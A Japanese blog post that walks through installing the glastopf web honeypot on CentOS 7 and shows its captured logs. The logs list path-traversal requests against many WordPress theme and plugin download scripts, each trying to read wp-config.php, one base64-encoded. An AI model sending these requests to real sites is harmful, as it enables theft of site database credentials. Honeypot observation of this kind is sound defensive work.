phpMyAdminや、Wordpressのプラグインの脆弱性をつかれてクラックされるケースがある。
不審者の行動を安全に観察したい!
そんな時に使えるツールが、glastopf 。
このハニーポットでどんなアクセスが来るのか探ってみよう!
glastopf はwebに特化したハニーポット。
導入手順は以下の通り。
なお、導入に際して、使用したOS は CentOS 7.1.1503
各種インストール
1 | yum groupinstall "Development Tools" yum install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel php-devel libxml2-devel libxslt-devel atlas atlas-devel gcc-gfortran g++ git php php-devel wget mysql mysql-server mysql-devel libevent-headers libffi-devel easy_install pip yum -y install python-devel |
glastopf をセットアップ
1 | git clone https://github.com/glastopf/glastopf.git cd glastopf python setup.py install |
設定ファイルを作る。
1 | cd /opt/glastopf/ glastopf-runner ## エラーになるので ## 以下、修正をする。 groupadd glastopf useradd -g glastopf -s /usr/sbin/nologin glastopf chown -R glastopf:glastopf /opt/glastopf/ vim /opt/glastopf/glastopf.cfg # cat /opt/glastopf/glastopf.cfg [webserver] host = 0.0.0.0 port = 80 uid = glastopf gid = glastopf proxy_enabled = False |
起動
1 | glastopf-runner & |
起動して数日。怪しいアクセスが来てることを確認。
1 | 2015-06-23 13:35:40,203 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/plugins/gi-media-library/download.php?fileid=Li4vLi4vLi4vd3AtY29uZmlnLnBocA== 2015-06-23 13:35:40,600 (glastopf.glastopf) 206.190.138.84 requested GET ?sd_action=demo&file=wp-config.php 2015-06-23 13:35:40,994 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php 2015-06-23 13:35:41,387 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/lote27/download.php?download=../../../wp-config.php 2015-06-23 13:35:41,769 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php 2015-06-23 13:35:42,173 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/RedSteel/download.php?file=../../../wp-config.php 2015-06-23 13:35:42,562 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php 2015-06-23 13:35:42,950 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/markant/download.php?file=../../wp-config.php 2015-06-23 13:35:43,219 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/yakimabait/download.php?file=./wp-config.php 2015-06-23 13:35:43,620 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php 2015-06-23 13:35:43,997 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/felis/download.php?file=../wp-config.php 2015-06-23 13:35:44,271 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php 2015-06-23 13:35:44,715 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php 2015-06-23 13:35:45,147 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/epic/includes/download.php?file=wp-config.php 2015-06-23 13:35:45,553 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php 2015-06-23 13:35:45,965 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php 2015-06-23 13:35:46,232 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php 2015-06-23 13:35:46,487 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php 2015-06-23 13:35:46,750 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php |
良いハニーポットライフを!
参照URL: VPSにハニーポット(Glastopf) を入れてみた